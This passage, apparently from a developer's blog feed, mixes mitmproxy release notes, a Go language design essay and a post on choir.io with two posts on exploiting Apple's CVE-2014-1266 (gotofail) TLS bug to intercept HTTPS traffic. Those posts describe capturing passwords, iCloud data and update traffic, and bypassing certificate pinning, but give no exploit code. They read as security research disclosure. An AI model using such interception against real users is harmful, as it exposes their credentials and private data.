inconvenient. Luckily it turns out that we can <a href="https://github.com/mitmproxy/netlib/blob/master/netlib/certffi.py">munge an obscure
flag</a> in the
RSA data-structures to circumvent this, which allows us to exploit #gotofail in
pure Python.</p>
<p>The moment I got this exploit working, I marched upstairs and confiscated my
wife's un-updated iPhone 5 to add it to my pool of test devices (never fear -
it's been replaced with a nice new 5S). Devices running IOS of the right
vintage have suddenly become the gold standard for analysis and pen testing.
This beautiful vulnerability lets us circumvent SSL effortlessly, completely
sidestepping certificate pinning for all the applications I've tried, without
any <a href="https://github.com/iSECPartners/ios-ssl-kill-switch">cumbersome and invasive interference with the
device</a>. Combine this with
the fact that these same devices also have an un-tethered jailbreak, and I think
it's unlikely that we'll ever have an analysis platform this nice again. So,
stockpile your IOS 7.0.6 devices now, and intercept all the things.</p>
Exploiting CVE-2014-1266 with mitmproxy
2014-02-25T00:00:00+00:00
2014-02-25T00:00:00+00:00
https://corte.si/posts/security/cve-2014-1266/
<p>This post is a quick recap of work I've been discussing on Twitter in the last
few hours. I've just finished putting together a version of
<a href="http://mitmproxy.org">mitmproxy</a> that takes advantage of
<a href="http://support.apple.com/kb/HT6147">CVE-2014-1266</a>, Apple's <a href="https://www.imperialviolet.org/2014/02/22/applebug.html">critical SSL/TLS
bug</a>. We knew in theory
that the issue should give access to all SSL traffic using Apple's broken
implementation - I can now report that this is also true in practice.</p>
<p>I've confirmed full transparent interception of HTTPS traffic on both IOS (prior
to 7.0.6) and OSX Mavericks. Nearly all encrypted traffic, including usernames,
passwords, and even Apple app updates can be captured. This includes:</p>
<ul>
<li>App store and software update traffic</li>
<li>iCloud data, including KeyChain enrollment and updates</li>
<li>Data from the Calendar and Reminders</li>
<li>Find My Mac updates</li>
<li>Traffic for applications that use certificate pinning, like Twitter</li>
</ul>
<p>It's difficult to overstate the seriousness of this issue. With a tool like
mitmproxy in the right position, an attacker can intercept, view and modify
nearly all sensitive traffic. This extends to the software update mechanism
itself, which uses HTTPS for deployment.</p>
<p>At the time of writing, Apple still doesn't have a fix deployed for OSX. It took
less than a day to get the patched version of mitmproxy and its supporting
libraries up and running. I won't be releasing my patches until well after
Apple's pending update, but it's safe to assume that this is now being exploited
in the wild. Of course, intelligence agencies have no doubt been on top of this
for some time - perhaps some of the <a href="http://news.yahoo.com/security-expert-calls-nbc-whiny-report-sochi-olympics-003047841.html">inflammatory Sochi security horror
stories</a>
were plausible after all.</p>
mitmproxy and pathod 0.10
2014-01-29T00:00:00+00:00
2014-01-29T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_10/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just released v0.10 of both <a href="http://mitmproxy.org">mitmproxy</a> and
<a href="http://pathod.org">pathod</a>. This is chiefly a bugfix release, with a few nice
additional features to sweeten the pot.</p>
<div class="media">
<a href="mitmproxy-webapp.png">
<img src="mitmproxy-webapp.png" />
</a>
</div>
<p>Perhaps the most visible change has been a huge improvement in the recommended
method for installing the mitmproxy certificates. Certs are now served straight
from the web application hosted in mitmproxy, which means that in most cases
cert installation is as simple as typing the mitmproxy URL into the device
browser. <a href="http://mitmproxy.org/doc/certinstall/webapp.html">See the docs</a> for
more.</p>
<p>In other, minor news - I see that the <a href="https://github.com/mitmproxy/mitmproxy">mitmproxy
project</a> has just passed 2000 stars on
GitHub. Between PyPI and the files we serve from
<a href="http://mitmproxy.org">mitmproxy.org</a>, the project has also seen nearly 100k
downloads in the last year (after removing obvious bots). I know, I know -
figures like these don't mean much, but it's still nice to see that people are
using and enjoying mitmproxy.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Support for multiple scripts and multiple script arguments</li>
<li>Easy certificate install through the in-proxy web app, which is now
enabled by default</li>
<li><a href="http://mitmproxy.org/doc/features/forwardproxy.html">Forward proxy mode</a>,
that forwards proxy requests to an upstream HTTP server</li>
<li>Reverse proxy now works with SSL</li>
<li>Search within a request/response using the "/" and "n" shortcut keys</li>
<li>A view that beautifies CSS files if cssutils is available</li>
<li>Many bug fixes, documentation improvements, and more.</li>
</ul>
How I Learned to Stop Worrying and Love Golang
2013-11-21T00:00:00+00:00
2013-11-21T00:00:00+00:00
https://corte.si/posts/code/go/golang-practicaly-beats-purity/
<p>Here's a riff on Malcolm Gladwell's <a href="http://en.wikipedia.org/wiki/Outliers_(book)">rule of thumb about
mastery</a>: you don't really know
a programming language until you've written 10,000 lines of production-quality
code in it. Like the original this is a generalization that is undoubtedly false
in many cases - still, it broadly matches my intuition for most languages and
most programmers<sup class="footnote-reference"><a href="#3">1</a></sup>. At the beginning of this year, I wrote <a href="https://corte.si/posts/code/go/go-rant/">a sniffy post
about Go</a> when I was about 20% of the way to knowing
the language by this measure. Today's post is an update from further along the
curve - about 80% - following a recent set of adventures that included entirely
rewriting <a href="http://choir.io">choir.io</a>'s core dispatcher in Go. My opinion of Go
has changed significantly in the meantime. Despite my initial exasperation, I
found that the experience of actually writing Go was not unpleasant. The shallow
issues became less annoying over time (perhaps just due to habituation), and the
deep issues turned out to be less problematic in practice than in theory. Most
of all, though, I found Go was just a fun and productive language to work in. Go
has colonized more and more use cases for me, to the point where it is now
seriously eroding my use of both Python and C.</p>
<p>After my rather slow Road to Damascus experience, I noticed something odd: I
found it difficult to explain why Go worked so well in practice. Sure, Go has a
triad of really smashing ideas (interfaces, channels and goroutines), but my
list of warts and annoyances is long enough that it's not clear on paper that
the upsides outweigh the downsides. So, my experience of actually cutting code
in Go was at odds with my rational analysis of the language, which bugged me.
I've thought about this a lot over the last few months, and eventually came up
with an explanation that sounds like nonsense at first sight: Go's weaknesses
are also its strengths. In particular, many design choices that seem to reduce
coherence and maintainability at first sight actually combine to give the
language a practical character that's very usable and compelling. Let's see if I
can convince you that this isn't as crazy as it sounds.</p>
<h2 id="maps-and-magic">Maps and magic</h2>
<p>Let's pretend that we're the designers of Go, and see if we can follow the
thinking that went into a seemingly simple part of the language - the value
retrieval syntax for maps. We begin with the simplest possible case - direct,
obvious, and familiar from a number of other languages:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>It would be nice if we could keep it this simple, but there's a complication -
what if "foo" doesn't exist in the map? The fact that Go doesn't have
exceptions limits the possibilities. We can discard some gross options out of
hand - for instance, making this a runtime error or returning a magic value
flagging non-existence are both pretty horrible. A more plausible route is to
pass an existence flag back as a second return value:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>So far, so logical, and if consistency was the primary goal, we would stop here.
However, having two return arguments would make many common patterns of use
inconvenient. You would constantly be discarding the <strong>ok</strong> flag in situations
where it wasn't needed. Another repercussion is that you couldn't directly use
the results in an <strong>if</strong> clause. Instead of a clean phrasing like this (relying
on the zero value returned by default):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"] {
</span><span style="color:#65737e;">// Do something
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>... you would have to do this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]; </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">{
</span><span style="color:#65737e;">// Do something
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>Ugh. What we really want is the best of both worlds: the ease of the
first signature plus the flexibility of the second. In fact, Go does exactly
that, in a surprising way: it discards some basic conceptual constraints, and
makes the data returned by the map accessor depend on how many variables it's
assigned to. When it's assigned to one variable, it just returns the value.
When it's assigned to two variables, it also returns an existence flag.</p>
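<p>Here's the contrast in a compact, runnable sketch (the <strong>scores</strong> map is my own example, not from the text above):</p>

```go
package main

import "fmt"

func main() {
	scores := map[string]int{"foo": 1}

	// One assignment target: just the value (the zero value if the key is absent).
	v := scores["bar"]
	fmt.Println(v) // 0

	// Two targets: the value plus an existence flag.
	w, ok := scores["foo"]
	fmt.Println(w, ok) // 1 true
}
```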
<p>Compare this with Python. The dictionary access syntax is identical:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">v = mymap["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>Python does have exceptions, so non-existence is signaled through a
<strong>KeyError</strong>, and the dictionary interface includes a <strong>get</strong> method that
allows the user to specify a default return when this is too cumbersome. This
is certainly consistent on the surface, but there's also a deeper structure
that helps the user understand what's going on. The square bracket accessor
syntax is just syntactic sugar, because the call above is equivalent to this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">v = mymap.</span><span style="color:#96b5b4;">__getitem__</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">")
</span></code></pre>
<p>In a sense, then, the value access is just a method call. The coder can write a
dictionary of their own that acts just like a built-in dictionary<sup class="footnote-reference"><a href="#2">2</a></sup>, and can
also build a clear mental model of what's going on underneath. Python
dictionaries are conceptually built <em>up</em> from more primitive language elements,
where Go maps are designed <em>down</em> from concrete use cases.</p>
<h2 id="range-a-compendium-of-use-cases">Range: a compendium of use cases</h2>
<p>An even stranger beast is the <strong>range</strong> clause of Go's for loops. Like map
accessors, <strong>range</strong> will return either one value or two, depending on the
number of variables assigned to. What's particularly revealing about <strong>range</strong>
is the way these results differ depending on the data type being ranged over.
Consider this piece of code, for example:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">for </span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">y </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">range </span><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">{
}
</span></code></pre>
<p>To figure out what this does, we need to know the type of <strong>v</strong>, and then
consult a table like this:<sup class="footnote-reference"><a href="#1">3</a></sup></p>
<table class="table table-bordered">
<tr>
<th>Range expression</th>
<th>1st Value</th>
<th>2nd Value</th>
</tr>
<tr>
<td>array or slice</td>
<td>index i</td>
<td>a[i]</td>
</tr>
<tr>
<td>map</td>
<td>key k</td>
<td>m[k]</td>
</tr>
<tr>
<td>string</td>
<td>index i of rune</td>
<td>rune (an int32)</td>
</tr>
<tr>
<td>channel</td>
<td>element</td>
<td>(compile error)</td>
</tr>
</table>
<p>What range does for arrays and maps seems consistent and not particularly
surprising. Things get a tad odd with channels. A second variable
arguably doesn't make much sense when ranging over a channel, so trying to do
this results in a compile time error. Not terribly consistent, but logical.</p>
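<p>To make the channel case concrete, here's a small sketch of my own:</p>

```go
package main

import "fmt"

func main() {
	ch := make(chan int, 3)
	for i := 1; i <= 3; i++ {
		ch <- i
	}
	close(ch) // range stops once the channel is closed and drained

	// Exactly one loop variable; "for i, v := range ch" would not compile.
	for v := range ch {
		fmt.Println(v)
	}
}
```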
<p>Weirder still is <strong>range</strong> over strings. When operating on a string, range
returns <a href="http://golang.org/ref/spec#Constants">runes</a> (Unicode code points) not
bytes. So, this code:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= "</span><span style="color:#a3be8c;">a</span><span style="color:#96b5b4;">\u00fc</span><span style="color:#a3be8c;">b</span><span style="color:#c0c5ce;">"
</span><span style="color:#b48ead;">for </span><span style="color:#bf616a;">a</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">b </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">range </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">a</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">b</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>Prints this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0 97
1 252
3 98
</span></code></pre>
<p>Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is
two bytes wide in UTF-8. And look what happens when we now retrieve the value
at that offset from the array. This:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">])
</span></code></pre>
<p>Prints this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">195
</span></code></pre>
<p>What gives? At first glance, it's reasonable to expect this to print 252, as
returned by <strong>range</strong>. That's wrong, though, because string access by index
operates on bytes, so what we're given is the first byte of the UTF-8 encoding
of the rune. This is bound to cause subtle bugs. Code that works perfectly on
ASCII text simply due to the fact that UTF-8 encodes these in a single byte
will fail mysteriously as soon as non-ASCII characters appear.</p>
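<p>The usual escape hatches, for what it's worth, are to count and index by rune rather than by byte - a sketch of my own using only the standard library:</p>

```go
package main

import (
	"fmt"
	"unicode/utf8"
)

func main() {
	s := "a\u00fcb"

	// Byte-oriented views: len and indexing count bytes.
	fmt.Println(len(s), s[1]) // 4 195

	// Rune-oriented views: count runes, or convert for rune indexing.
	fmt.Println(utf8.RuneCountInString(s)) // 3
	r := []rune(s)
	fmt.Println(r[1]) // 252
}
```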
<p>My argument here is that <strong>range</strong> is a very clear example of design directly
from concrete use cases down, with little concern for consistency. In fact, the
table of <strong>range</strong> return values above is really just a compendium of use
cases: at each point the result is simply the one that is most directly useful.
So, it makes total sense that ranging over strings returns runes. In fact,
doing anything else would arguably be incorrect. What's characteristic here is
that no attempt was made to reconcile this interface with the core of the
language. It serves the use case well, but feels jarring.</p>
<h2 id="arrays-are-values-maps-are-references">Arrays are values, maps are references</h2>
<p>One final example along these lines. A core irregularity at the heart of Go is
that arrays are values, while maps are references. So, this code will
modify the <strong>s</strong> variable:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">x </span><span style="color:#b48ead;">map</span><span style="color:#c0c5ce;">[</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">] </span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">){
</span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = </span><span style="color:#d08770;">2
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">main</span><span style="color:#c0c5ce;">() {
</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">map</span><span style="color:#c0c5ce;">[</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>And print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">map[0:2]
</span></code></pre>
<p>While this code won't:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">x </span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">){
</span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = </span><span style="color:#d08770;">2
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">main</span><span style="color:#c0c5ce;">() {
</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= [</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>And will print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[0]
</span></code></pre>
<p>This is undoubtedly inconsistent, but it turns out not to be an issue in
practice, mostly because slices <em>are</em> references, and are passed around much
more frequently than arrays. This issue has surprised enough people to make it
into the Go FAQ, <a href="http://golang.org/doc/faq#references">where the justification is as
follows</a>:</p>
<blockquote>
<p>There's a lot of history on that topic. Early on, maps and channels were
syntactically pointers and it was impossible to declare or use a non-pointer
instance. Also, we struggled with how arrays should work. Eventually we
decided that the strict separation of pointers and values made the language
harder to use. This change added some regrettable complexity to the language
but had a large effect on usability: Go became a more productive, comfortable
language when it was introduced.</p>
</blockquote>
<p>This is not exactly the clearest explanation for a technical decision I've ever
read, so allow me to paraphrase: "Things evolved this way for pragmatic
reasons, and consistency was never important enough to force a reconciliation".</p>
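<p>For completeness, here's the slice version of the same experiment (my own sketch): a slice header is copied on the way into the function, but it still points at the caller's backing array, so the write is visible outside.</p>

```go
package main

import "fmt"

// mod receives a copy of the slice header, which still
// references the caller's backing array.
func mod(x []int) {
	x[0] = 2
}

func main() {
	s := []int{0}
	mod(s)
	fmt.Println(s) // [2]
}
```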
<h2 id="the-g-word">The G Word</h2>
<p>Now we get to that perpetual bugbear of Go critiques: the lack of generics.
This, I think, is the deepest example of the Go designers' willingness to
sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a
tad weary of this argument by now, but the issue is substantive and worth
facing squarely. The crux of the matter is this: Go's built-in container types
are super special. They can be parameterized with the type of their contained
values in a way that user-written data structures can't be.</p>
<p>The supported way to do generic data structures is to use blank interfaces.
Let's look at an example of how this works in practice. First, here is a simple
use of the built-in slice type.</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">l </span><span style="color:#c0c5ce;">:= </span><span style="color:#96b5b4;">make</span><span style="color:#c0c5ce;">([]</span><span style="color:#b48ead;">string</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = "</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"
</span><span style="color:#bf616a;">str </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">]
</span></code></pre>
<p>In the first line we initialize a slice with element type <strong>string</strong>. We then
insert a value, and in the final line, we retrieve it. At this point, <strong>str</strong>
has type <strong>string</strong> and is ready to use. The user-written analogue of this
might be a modest data structure with <strong>put</strong> and <strong>get</strong> methods. We can
define this using interfaces like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">type </span><span style="color:#c0c5ce;">gtype </span><span style="color:#b48ead;">struct </span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">data </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{}
}
</span><span style="color:#b48ead;">func </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">t </span><span style="color:#c0c5ce;">*</span><span style="color:#b48ead;">gtype</span><span style="color:#c0c5ce;">) </span><span style="color:#8fa1b3;">put</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">v </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{}) {
</span><span style="color:#bf616a;">t</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">data </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">v
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">t </span><span style="color:#c0c5ce;">*</span><span style="color:#b48ead;">gtype</span><span style="color:#c0c5ce;">) </span><span style="color:#8fa1b3;">get</span><span style="color:#c0c5ce;">() </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{} {
</span><span style="color:#b48ead;">return </span><span style="color:#bf616a;">t</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">data
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>To use this structure, we would say:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">gtype</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">put</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">")
</span><span style="color:#bf616a;">str </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">get</span><span style="color:#c0c5ce;">().(</span><span style="color:#b48ead;">string</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>We can assign a string to a variable with the empty interface type without
doing anything special, so <strong>put</strong> is simple. However, we need to use a type
assertion on the way out, otherwise the <strong>str</strong> variable will have type
<strong>interface{}</strong>, which is probably not what we want.</p>
<p>There are a number of issues here. It's cosmetically bothersome that we have to
place the burden of type assertion on the caller of our data structure, making
the interface just a little bit less nice to use. But the problems extend
beyond syntactic inconvenience - there's a substantive difference between these
two ways of doing things. Trying to insert a value of the wrong type into the
built-in array causes a compile-time error, but the type assertion acts at
run-time and causes a panic on failure. The empty-interface paradigm sidesteps
Go's compile-time type checking, negating any benefit we may have received from
it.</p>
<p>The biggest issue for me, though, is the conceptual inconsistency. This is
something that's difficult to put into words, so here's a picture:</p>
<div class="media">
<a href="inconsistency.jpg">
<img src="inconsistency.jpg" />
</a>
</div>
<p>The fact that the built-in containers magically do useful things that
user-written code can't irks me. It hasn't become less jarring over time, and
still feels like a bit of grit in my eye that I can't get rid of. I might be an
extreme case, but this is an aesthetic instinct that I think is shared by many
programmers, and would have convinced many language designers to approach the
problem differently.</p>
<p>The extent to which Go's lack of generics is a critical problem, however, is
not the point here. The meat of the matter is <strong>why</strong> this design decision was
taken, and what it reveals about the character of Go. Here's how the lack of
generics is <a href="http://blog.golang.org/go-at-io-frequently-asked-questions">justified by the Go
developers</a>:</p>
<blockquote>
<p>Many proposals for generics-like features have been mooted both publicly and
internally, but as yet we haven't found a proposal that is consistent with
the rest of the language. We think that one of Go's key strengths is its
simplicity, so we are wary of introducing new features that might make the
language more difficult to understand.</p>
</blockquote>
<p>Instead of creating the atomic elements needed to support generic data
structures and then adding a suite of them to the standard library, the Go team
went the other way. There was a concrete use case for good data structures, and
so they were added. Attempting a deep reconciliation with the rest of the
language was a secondary requirement that was so unimportant that it fell by
the wayside for Go 1.x.</p>
<h1 id="a-pragmatic-beauty">A Pragmatic Beauty</h1>
<p>Let's over-simplify for a moment and divide languages into two extreme camps. On
the one hand, you have languages that are highly consistent, with most higher
order functionality deriving from the atomic elements of the language. In this
camp, we can find languages like Lisp. On the other hand are languages that are
shamelessly eager to please. They tend to grow organically, sprouting syntax as
needed to solve specific pragmatic problems. As a consequence, they tend to be
large, syntactically diverse, not terribly coherent, and occasionally even
<a href="http://www.perlmonks.org/?node_id=663393">unparseable</a>. In this
camp, we find languages like Perl. It's tempting to think that there exists a
language somewhere in the infinite multiverse of possibilities that unites
perfect consistency and perfect usability, but if there is, we haven't found
it. The reality is that all languages are a compromise, and that balancing
these two forces against each other is really what makes language design so
hard. Placing too much value on consistency constrains the human concessions we
can make for mundane use cases. Making too many concessions results in a
language that lacks coherence.</p>
<p>Like many programmers, I instinctively prefer purity and consistency and
distrust "magic". In fact, I've never found a language with a strongly
pragmatic bent that I really liked. Until now, that is. Because there's one
thing I'm pretty clear on: Go is on the Perl end of this language design
spectrum. It's designed firmly from concrete use cases down, and shows its
willingness to sacrifice consistency for practicality again and again. The
effects of this design philosophy permeate the language. This, then, is the
source of my initial dissatisfaction with Go: I'm pre-disposed to dislike many
of its core design decisions.</p>
<p>Why, then, has the language grown on me over time? Well, I've gradually become
convinced that practically-motivated flaws like the ones I list in this post
add up to create Go's unexpected nimbleness. There's a weird sort of alchemy
going on here, because I think any one of these decisions in isolation makes Go
a worse language (even if only slightly). Together, however, they jolt Go out
of a local maximum many procedural languages are stuck in, and take it
somewhere better. Look again at each of the cases above, and imagine what the
cumulative effect on Go would have been if the consistent choice had been made
each time. The language would have more syntax, more core concepts to deal
with, and be more verbose to write. Once you reason through the repercussions,
you find that the result would have been a worse language overall. It's clear
that Go is not the way it is because its designers didn't know better, or
didn't care. Go is the result of a conscious pragmatism that is deep and
audacious. Starting with this philosophy, but still managing to keep the
language small and taut, with almost nothing dispensable or extraneous, took
great discipline and insight, and is a remarkable achievement.</p>
<p>So, despite its flaws, Go remains graceful. It just took me a while to
appreciate it, because I expected the grace of a ballet dancer, but found the
grace of a battered but experienced bar-room brawler.</p>
<p>--</p>
<p>Edited to remove some inaccuracies about channels.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">3</sup>
<p>Simplified from <a href="https://code.google.com/p/go-wiki/wiki/Range">here</a>.</p>
</div>
<div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup>
<p>I don't mean mundane details like the syntax and core concepts of a
language. In the case of Go, you can get a handle on these in an hour by
reading the language specification.</p>
</div>
<div class="footnote-definition" id="3"><sup class="footnote-definition-label">1</sup>
<p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact
subtle ways in which Python dictionaries are not just objects like any other.</p>
</div>
mitmproxy and pathod 0.9.2
2013-08-25T00:00:00+00:00
2013-08-25T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9_2/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just released v0.9.2 of both <a href="http://mitmproxy.org">mitmproxy</a> and
<a href="http://pathod.org">pathod</a>. This is a bugfix release, chiefly to address two
crashing issues affecting mitmproxy when relaying SSL traffic. A range of other
fixes and improvements are also included - if you use mitmproxy, you should
upgrade.</p>
<h2 id="changelog">CHANGELOG</h2>
<ul>
<li>Improvements to the mitmproxywrapper.py helper script for OSX.</li>
<li>Don't take minor version into account when checking for serialized file
compatibility.</li>
<li>Fix a bug causing resource exhaustion under some circumstances for SSL
connections.</li>
<li>Revamp the way we store interception certificates. We used to store these
on disk, they're now in-memory. This fixes a race condition related to
cert handling, and improves compatibility with Windows, where the rules
governing permitted file names are weird, resulting in errors for some
valid IDNA-encoded names.</li>
<li>Display transfer rates for responses in the flow list.</li>
<li>Many other small bugfixes and improvements.</li>
</ul>
Introducing choir.io
2013-08-16T00:00:00+00:00
2013-08-16T00:00:00+00:00
https://corte.si/posts/choir/intro/
<div class="media">
<a href="choir.png">
<img src="choir.png" />
</a>
<div class="subtitle">
choir.io
</div>
</div>
<p>Today, I'm raising the veil (slightly) on a new project -
<a href="https://choir.io">choir.io</a>. The most succinct description of choir.io is that
it is a service that turns events into sound. Why would you want to do that?
Well, I believe that there are compelling reasons to make sound part of your
monitoring stack. Let's see if I can convince you.</p>
<h2 id="the-soundscape">The soundscape</h2>
<p>When I walk into my study every morning, I'm surrounded by a rich, subtle
soundscape that exists just beneath conscious perception. My air-conditioner,
computers and monitors all emit hums and purrs. I can "tune in" to these if I
focus, but they usually only draw my attention when something changes. When the
power goes out there is a deathly silence; when a CPU fan's noise changes pitch
or texture, it bothers me immediately.</p>
<p>Layered over this background are more obtrusive sounds, closer to the threshold
of awareness - the clacking of keyboards, faint noises of my family getting
ready for their day upstairs, the front door opening and closing. Whether or
not I pay attention to these is somewhat context dependent. Am I waiting, for
instance, for my wife and kids to start trooping down the stairs so I can join
them for my son's swimming lesson? If I am, I listen out for those sounds
specifically. I get an enormous amount of information about my world from these
more discrete, event-related noises.</p>
<p>Finally, there are the really obtrusive sounds, things that immediately get my
attention. This might be someone saying my name, my phone ringing, a knock at
the door, or a smoke alarm. I'm very aware of these, and they usually signal
something I have to deal with immediately.</p>
<p>These layers of more and less obtrusive sounds form a soundscape that is
ever-present, and utterly necessary in our day-to-day lives. Notice how
effortless this process of extracting meaning from our ambient sounds is. Our
minds process this information stream without any mental exertion, filter out
what we don't need to notice, and draw our attention to what we do. There's a
lot of cognitive research (that I might delve into in future posts) that shows
that our brains and auditory systems are specifically designed to make sense of
the world in this way.</p>
<p>We have nothing like this rich texture of ambient awareness for the technology
